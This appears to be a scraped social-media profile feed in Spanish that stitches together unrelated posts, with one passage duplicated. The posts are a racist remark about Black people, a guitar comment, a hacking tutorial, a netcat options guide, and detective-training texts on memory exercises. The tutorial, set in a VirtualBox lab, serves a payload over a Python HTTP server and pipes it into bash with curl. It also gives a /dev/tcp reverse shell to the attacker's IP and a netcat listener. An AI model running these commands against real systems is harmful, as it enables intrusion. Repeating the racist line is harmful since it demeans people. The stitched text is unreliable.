Avatar
0m4p75v3h9hs
9fe722703daf17ab84b33e4f51bcecb9080dc048fcf6f8586bee874132957a4e
I am student of we3, hacking and phylosophy

No odiaba a los negros, solo decía que eran negros porque no se bañaban

Es tremendo, no lo había escuchado. Son dos virtuosos pero becker es dueño de una parte de mi corazón. Sabes si tenía la guitarra escalopada?

Servicio web de Python para Comunicarse en la Red

----------------------------------------------------------------------

Una vez hayamos obtenido ejecución remota de comandos en un servidor, suele ser necesario poder transferir archivos al objetivo o incluso ayudarnos de un servidor web para obtener la reverse shell, por lo que ahora vamos a ver, de forma breve, cómo levantar un servidor HTTP con python para lograr esto mismo.

en mi maquina atacate, voy a crear un payload que se llame “payload.sh”

Con nano creamos un fichero que se llame "payload.sh" e ingresamos el tipico script de revershell

Una vez guardado quiero que compartirlo con la maquina victima para que lo ejecute y para esto se puede usar

pyhton3 -m http.server 80

esto va a levantar un servidor por el puerto 80 con todos los archivos que se encuentren en el actual directorio

Si vamos a la maquina victima, abrimos el navegador y ponemos la ip de la maquina atacante que en este caso es 192.168.0.82, se accede al archivo que esta compartiendo desde la maquina atacante

Ahora corre un servidor web corriendo por el p 80 compartiendo archivos

Si vamos a la maquina victima, abrimos el navegador y ponemos la ip de la maquina atacante que en este caso es 192.168.0.82, se accede al archivo que esta compartiendo desde la maquina atacante

De tal forma que si le damos click al link

Una vez guardado se puede ejecutar.

Si tuvieramos ejecucion remota, dentro de la terminal, podriamos accionar de la siguiente forma:

curl http://192.168.0.82/payload.sh | bash

Escuchando desde la maquina atacante con nc -vlnp 443

Hacemos una peticion al servidor web donde se esta compratiendo el archivo y luego una vez obtenido el archivo, se va interpretar con bash

USO DE NETCAT

-------------------------

Voy a utilizar netcat para hacer una revers shell a una maquina lubuntu que se encuentra en mi red, dentro de VBox

Comenzare con buscar la siguiente pag https://www.revshells.com/

Tenemos la opcion de ingresar nuestra ip y el puerto por el cual vamos a conectarnos; en este caso seleccione la ip de mi maquina atacante kali linux corriendo por el puerto 443

como se ve en la imagen, fije los parametro y me devolvio una linea de codigo

[ sh -i >& /dev/tcp/192.168.0.82/443 0>&1 ]

Ahora voy a ponerme en escucha con el comando que me indica la misma pag o sea:

[ sudo nc -lvnp 443 ]

Digamos que obtuve acceso a la maquina, explotando una vulnerabilidad o simplemente vi luz y entre. De cualquier forma, ahora estando dentro puedo ejecutar el script y se conecta, como se ve

como se podra ver, ya tengo acceso

¿Qué es Netcat y cómo funciona?

--------------------------------------------

Netcat es una herramienta de línea de comandos que sirve para escribir y leer datos en la red. Para la transmisión de datos, Netcat usa los protocolos de red TCP/IP y UDP. La herramienta proviene originalmente del mundo de Unix; desde entonces, se ha expandido a todas las plataformas.

Gracias a su universalidad, a Netcat se la llama “la navaja suiza del TCP/IP”. Puede utilizarse, por ejemplo, para diagnosticar errores y problemas que afecten a la funcionalidad y la seguridad de una red. Netcat también puede escanear puertos, hacer streaming de datos o simplemente transferirlos. Además, permite configurar servidores de chat y de web e iniciar consultas por correo. Este software minimalista, desarrollado a mediados de los 90, puede operar en modo servidor y cliente.

Sintaxis de Netcat: ¿qué comandos y opciones están disponibles?

La sintaxis de Netcat consiste en dos componentes fundamentales: el comando básico “nc”, siempre idéntico, seguido por varias “opciones”. El comando básico direcciona al archivo de programa nc.exe, mientras que las opciones determinan el rango concreto de funciones de la versión de Netcat, por lo que varían dependiendo del sistema operativo y de la versión de Netcat utilizada.

La siguiente tabla se limita a recoger las opciones más importantes disponibles en la mayoría de las versiones para Linux, macOS y Windows. También se enumeran otras opciones útiles, en particular las extensiones de la versión GNU Netcat, ampliamente utilizada en Linux, Unix y macOS:

Opciones Descripción

-4 Fuerza el uso de IPv4 (GNU Netcat)

-6 Fuerza el uso de IPv6 (GNU Netcat)

-d Elimina Netcat de la consola (operación en segundo plano; disponible en Windows y en las versiones actuales de GNU Netcat)

-D Habilita la opción de depurar los sockets (GNU Netcat)

-h (display help) Muestra la ayuda (comandos/opciones con una breve descripción)

-i (secs) Retardo en segundos para las líneas enviadas o los puertos escaneados

-k Netcat espera una nueva conexión después de que termine la anterior (solo en GNU Netcat y en combinación con “-l”)

-l (listen mode) Modo de escucha/listen y servidor para las solicitudes de conexión entrantes (sobre el puerto especificado)

-L (listen harder) Hace que Netcat funcione en modo de escucha incluso después de las desconexiones del lado del cliente (usando los mismos parámetros en todo momento; solo en la versión de Windows)

-n (numeric-only) Solo números IP, sin nombres DNS

-o (file) Se realiza un volcado hexadecimal del tráfico (el contenido de los archivos se muestra en vista hexadecimal); se utiliza para la depuración (debugging de aplicaciones de red); permite el registro de la comunicación (sniffing) para paquetes salientes y entrantes

-p (port) Especifica el puerto de origen local que Netcat debe utilizar para las conexiones salientes

-r Usa valores de puerto aleatorios al escanear (para puertos locales y remotos)

-s (adress) Especifica la dirección de la fuente local (dirección o nombre IP)

-t Modo Telnet (por ejemplo, permite el direccionamiento del servidor a través de Telnet); requiere una compilación especial de Netcat; de lo contrario, la opción no está disponible

-u Uso del modo UDP (en lugar de TCP)

-U (gateway) Netcat utiliza sockets de dominio Unix (GNU Netcat)

-v Salida detallada (por ejemplo, para la visualización y el alcance de los mensajes de error mostrados)

-w (secs) Define los tiempos muertos: para establecer y cerrar una conexión (unidad: segundos)

-z Modo de escáner de puerto (modo de I/O 0); solo escaneo para servicios de escucha (no envío de datos)

Si, por ejemplo, quieres definir un servidor o un cliente para la transferencia de datos en la red, debes observar la siguiente sintaxis:

Modo cliente (connect to somewhere):

nc [opciones] [dirección IP/nombre del host] [puerto]

Modo de servidor (listen for inbound):

nc -l -p port [opciones] [nombre del host] [puerto]

El esquema básico para ejecutar un escaneo de puertos tiene el siguiente aspecto:

nc [opciones] [host] [puerto]

Copiar archivos con Netcat

-------------------------------------

Una característica muy popular de Netcat es la copia de archivos, que puede usarse para transferir grandes cantidades de datos, así como para clonar particiones individuales o discos duros enteros. En nuestro ejemplo, el archivo test.txt debe copiarse del ordenador A (cliente) al ordenador B (servidor) a través del puerto 6790. Es necesario seguir estos pasos:

Determinar la dirección IP del ordenador B (PC de destino).

Crear el archivo de prueba test.txt en el directorio Netcat del ordenador A. En este ejemplo, el archivo de prueba se encuentra en el directorio de Netcat del cliente. En el ordenador de destino B, el archivo copiado termina también en la carpeta de Netcat (se deben cambiar las otras rutas de archivo en consecuencia).

Introducir la sintaxis de Netcat en la línea de comandos.

Ordenador B (actúa como servidor receptor):

nc -l -p 6790 > test.txt

INTRO

Ordenador A (actúa como cliente que envía):

nc [dirección IP del ordenador B] 6790 < test.txt

INTRO

El éxito de la transferencia no se confirma en el símbolo del sistema. Puedes comprobar si el archivo se ha transferido correctamente buscándolo en la carpeta de destino.

Escanear puertos

Puedes ejecutar un escaneo y encontrar puertos abiertos, por ejemplo, para detectar errores y problemas de seguridad. En el siguiente ejemplo, el ordenador tiene la dirección IP 192.168.11.1. Después de la dirección IP, se puede especificar si se desean escanear puertos individuales (por ejemplo, 1), varios puertos (1, 2, 3, etc.) o un rango completo (1-1024):

nc -w 2 -z 192.168.10.1 1-1024

La opción “-w” determina la duración de un tiempo muerto (en este ejemplo, “Intentar conectarse a los puertos durante dos segundos”). La opción “-z” indica a Netcat que busque solo servicios de escucha y que no envíe ningún dato.

La opción “-v” sirve para obtener información más detallada sobre el escaneo:

nc -v -w 2 -z 192.168.11.1 1-1024

Netcat confirma entonces un puerto abierto que ha encontrado con el mensaje “succeeded!”.

Connection to 192.168.11.1 25 port [tcp/smtp] succeeded!

En los puertos escaneados 1-1024, se ejecutan los servicios más conocidos, como correo electrónico, FTP o SSH. En este ejemplo, Netcat ha encontrado el puerto SMTP abierto de un cliente de correo electrónico.

Netcat como programa de chat simple

Netcat puede establecer una conexión TCP o UDP simple entre dos ordenadores y luego abrir un canal de comunicación. En el siguiente ejemplo, el receptor se instala primero en el sistema remoto y se pone en modo de listening (escucha). De este modo, actúa como la parte de “escucha” y utiliza el puerto 1605 para recibir mensajes, a los que se puede acceder a través de la dirección IP 192.168.11.1:

nc -l -p 1605

INTRO

A continuación, el ordenador local (PC emisor) establece una conexión con el destinatario del mensaje mediante el siguiente comando:

nc 192.168.11.1 1605

INTRO

Si la conexión se establece correctamente, los mensajes pueden intercambiarse en ambas direcciones.

Configurar un servidor web simple

Netcat también sirve para configurar un servidor web simple. Si, por ejemplo, no se puede acceder al servidor original debido a problemas técnicos, se puede al menos responder a las solicitudes con un mensaje de error predeterminado (en forma de archivo .html) con información sobre el error:

nc -l -v -p 85 -w10 -L < mensaje de error.html

Netcat espera a las solicitudes en el puerto 85 y responde a ellas con el archivo mensaje de error.html. La opción “-L” asegura que Netcat mantenga este procedimiento más allá de una sola solicitud. El parámetro “-w” termina la conexión después de 10 segundos (tiempo muerto). El parámetro “-v” proporciona al operador del servidor información sobre las solicitudes y documentos, como el sistema operativo y el tipo de navegador del ordenador cliente solicitante mediante mensajes de estado.

El éxito suele premiar al Detective Perseverante

El investigador privado nunca debe darse por vencido. La experiencia

demuestra de continuo que casos aparentemente insolubles se develan, en el momento menos pensado,

siempre que no se abandone el hilo de la pesquisa. Recuerda que NO HAY CRÍMENES PERFECTOS,

HAY INVESTIGADORES IMPERFECTOS.

Para corroborarlo, voy a narrar un episodio auténtico: un crimen que se esclareció 60 años después de

cometido y cuando el culpable se consideraba definitivamente al margen de toda condena. Lo más insólito de

este caso fue el detalle que aportó la prueba irrefutable para incriminar al homicida.

Ocurrió en Argentina, ciudad de Comodoro Rivadavia, el 17 de abril de 1965. El fotógrafo

Antonio Ostoich acababa de atender a un cliente cuando fue ultimado de varios golpes en la nuca con una

barra de hierro. Después, con la misma barra, el o los asesinos trataron de destruir la cámara fotográfica, tras

de lo cual robaron todo el dinero que hallaron en la casa.

Pasaron los años y el caso llevaba miras de convertirse en otro crimen perfecto. Hasta que un día, muy lejano

de aquel en que había ocurrido el hecho, un Detective, contemplando la semidestruida cámara fotográfica,

pensó: ̈¿Porqué tanta saña contra una simple cámara? ¿No será porque quizás contiene alguna evidencia

delatora? ̈

La examinó, hallando en su interior el negativo de la última fotografía que había tomado la infortunada

víctima. Su intuición le dijo que esa persona tenía algo que ver con el homicidio. Así que hizo revelar el

negativo, se grabó en su mente ese rostro

y no perdió la esperanza de encontrarlo algún día. Y este día llegó, 12 años más tarde. Fue en Chile, donde el

pertinaz Detective, al cruzarse con cierto individuo, tuvo la certeza de que se trataba del hombre que buscaba.

Sometido a interrogatorio, el sospechoso no tardó en confesar su participación en el crimen del fotógrafo,

junto con otros dos cómplices, aquel lejano 17 de abril de 1965. Aquí lo vemos, posando en la alcaldía de

Comodoro Rivadavia, el 5 de diciembre de 1977, es decir, más de 12 años después de la anterior

fotografía.

El criminal había quedado ̈atrapado ̈ dentro de una cámara, pero también dentro de la fina telaraña tejida

por un hábil, sutil y paciente Detective.

Replying to Avatar 0m4p75v3h9hs

EJERCICIO PRIMERO.

Cuando estemos en nuestro lecho, antes de dormirnos, repasemos mentalmente las diferentes casas que

existen, desde la nuestra hasta la esquina.

Lógicamente, si vivimos en una esquina, concentraremos nuestra atención sobre las casas existentes en la

cuadra siguiente, hasta la próxima esquina.

Nuestra mente irá repasando, así, casa por casa, hasta llegar a la última. Al día siguiente caminaremos por la

cuadra indicada e iremos repasando las casas que en nuestra memoria hemos evocado la noche anterior.

Iremos diciendo: Esta es la casa de la familia Rodríguez; esta es la casa de los González; ésta la de los Duarte,

y así las demás. Es muy probable que en nuestra recorrida digamos de pronto: ̈Esta casa la pasé por alto, no

me acordé de ella ̈. Procederemos entonces a incluirla mentalmente en la lista de las casas que recordamos la

noche anterior.

Nuevamente, antes de dormirnos en la noche siguiente, concentraremos nuestra atención y memoria en las

casas controladas y registradas en nuestra memoria. Ahora es probable que podamos visualizar todas las

casas, sin olvidar ninguna.

Una vez logrado con éxito este ejercicio, lo repetiremos, pero esta vez recordando también las ventanas de

cada una de las casas ya retenidas en la memoria. Nuevamente registraremos algunos errores al evocar y

recordar las ventanas existentes y comprobar su exactitud al pasar ante ellas al día siguiente.

Este ejercicio, a la vez que permite desarrollar eficazmente la memoria, sirve para aumentar nuestro poder de

concentración, de manera que viene a cumplir un doble, eficaz objetivo.

EJERCICIO SEGUNDO.

Al levantarnos, de mañana, anotemos en un papel el nombre de una persona y guardemos el papel.

Al día siguiente escribamos un nuevo nombre, pero recordemos antes el que hemos escrito el día anterior.

Al tercer día escribamos, de memoria, naturalmente, los dos nombres anteriormente anotados, y luego

agreguemos otro.

De esta manera, paulatinamente iremos disponiendo de una larga lista de nombres de personas que cada día,

antes de anotar un nuevo nombre, escribiremos de memoria. Es probable que, en determinadas situaciones,

tengamos que recurrir a los papeles, esto es, a la lista de nombres anotados, para recordar alguno que se nos

escapa pero el ejercicio es espléndido para incrementar el poder de nuestra memoria.

EJERCICIO PRIMERO.

Cuando estemos en nuestro lecho, antes de dormirnos, repasemos mentalmente las diferentes casas que

existen, desde la nuestra hasta la esquina.

Lógicamente, si vivimos en una esquina, concentraremos nuestra atención sobre las casas existentes en la

cuadra siguiente, hasta la próxima esquina.

Nuestra mente irá repasando, así, casa por casa, hasta llegar a la última. Al día siguiente caminaremos por la

cuadra indicada e iremos repasando las casas que en nuestra memoria hemos evocado la noche anterior.

Iremos diciendo: Esta es la casa de la familia Rodríguez; esta es la casa de los González; ésta la de los Duarte,

y así las demás. Es muy probable que en nuestra recorrida digamos de pronto: ̈Esta casa la pasé por alto, no

me acordé de ella ̈. Procederemos entonces a incluirla mentalmente en la lista de las casas que recordamos la

noche anterior.

Nuevamente, antes de dormirnos en la noche siguiente, concentraremos nuestra atención y memoria en las

casas controladas y registradas en nuestra memoria. Ahora es probable que podamos visualizar todas las

casas, sin olvidar ninguna.

Una vez logrado con éxito este ejercicio, lo repetiremos, pero esta vez recordando también las ventanas de

cada una de las casas ya retenidas en la memoria. Nuevamente registraremos algunos errores al evocar y

recordar las ventanas existentes y comprobar su exactitud al pasar ante ellas al día siguiente.

Este ejercicio, a la vez que permite desarrollar eficazmente la memoria, sirve para aumentar nuestro poder de

concentración, de manera que viene a cumplir un doble, eficaz objetivo.

EDUCACION DE LA MEMORIA

Una persona de memoria fragil no puede ser detective, ya que esa facultad mental es los mas solidos pilares de toda su labor. Ahora bien, aunque no todo el mundo posee igualmente desarrollada la memoria, hay metodos muy eficaces para educarla y robustecerla.

LA NEMOTECNIA

Es un arte milenario (ya la practicaban los antiguos griegos) para retener en la memoria, cifras, fechas,

acontecimientos, etc., asociándolos a lugares, países, nombres propios, objetos, etc. En una palabra, los

métodos nemotécnicos se basan en asociaciones de ideas, que hacen las vece de “ayudamemoria”.

Vayamos a un ejemplo practico: si en este momento solicito que me citen 4 estados del sur de EEUU, la mayoria podria nombran 2, quizas 4, i don't know. Empero si les mostrase estas 4 imagenes, es mas facil asociarlo a los 4 estados

En efecto, al ver la torre petrolera ustedes nombrarían a Texas; recordarían a Arizona y su famoso desierto al

ver el cactus; el sombrero azteca les traería a la memoria Nueva México; y el paisaje turístico a la Florida. Es

decir, la memoria de ustedes hubiera despertado al influjo de la asociación de ideas.

El método nemotécnico, como pueden comprobar, es altamente eficaz. Para recordar apellidos, por ejemplo,

aconsejamos asociarlos con objetos. Ejemplos: Chávez, con llaves; Mederos, con madera; Cárdenas, con

cadenas; Sepúlveda, con sepulcro; etc.

¿Cómo llegar a ser un buen Detective?

Cualidades principales

La persona ideal para desempeñarse como Detective es aquella que reúne las siguientes cualidades:

a) Muy buenas dotes de observador.

b) Muy buena memoria.

c) Sagacidad

d) Minuciosidad

e) Mucha paciencia.

f) Intuición.

g) Discreción.

h) Perseverancia.

El Detective no nace; se hace

Esa nómina tan extensa de dotes exigibles a los aspirantes a Detective quizás pueda acobardar, en un primer

momento, a buena cantidad de quienes sueñan con imitar al legendario Sherlock Holmes. Sin embargo, aquí

cabe aplicar aquello tan viejo y sabio de que "nadie nace sabiendo"; en otras palabras, el estudio, la voluntad

y la constancia pueden suplir muchas veces con ventaja las carencias naturales.

Hay muchísimos casos de personas que, en apariencia, no están dotadas para esa profesión, y, sin embargo,

con el tiempo llegan a convertirse en famosos Detectives. Uno de los ejemplos más notables es el de Edwuard

Henry, prominente sabueso de Scotland Yard durante el siglo pasado.

Rechazado reiteradamente por su falta de dotes congénitas para desempeñar tales funciones, Henry se

propuso lograr toda la intuición que le había negado la Naturaleza, a base de una larga, paciente y sacrificada

experiencia de años, que él mismo relató así:

̈Alquilé una habitación en un barrio londinense muy frecuentado por elementos del bajo fondo y me dediqué

a observarlos la mayor cantidad de tiempo posible, Frecuenté las casas de juego y clubes nocturnos; trabé

relación con gente de todo tipo (porteros, mozos, sirvientes, etc.) tratando de retener en mi memoria sus

principales rasgos fisonómicos.

De esa manera logré reunir datos que no hubiera podido conseguir de ningún otro modo y que, muchos años

después, me resultaría valiosísimo para mis investigaciones. Por otra parte, las amistades que ya había

cultivado fueron tan útiles para mí que hasta me salvaron la vida en una ocasión: al descubrir mi verdadera

identidad, un ganster, que estaba ebrio, anunció su decisión de eliminarme, y gracias a un mozo de mi

amistad que alcanzó a quitarle las balas a su revólver, escapé milagrosamente de la muerte ̈.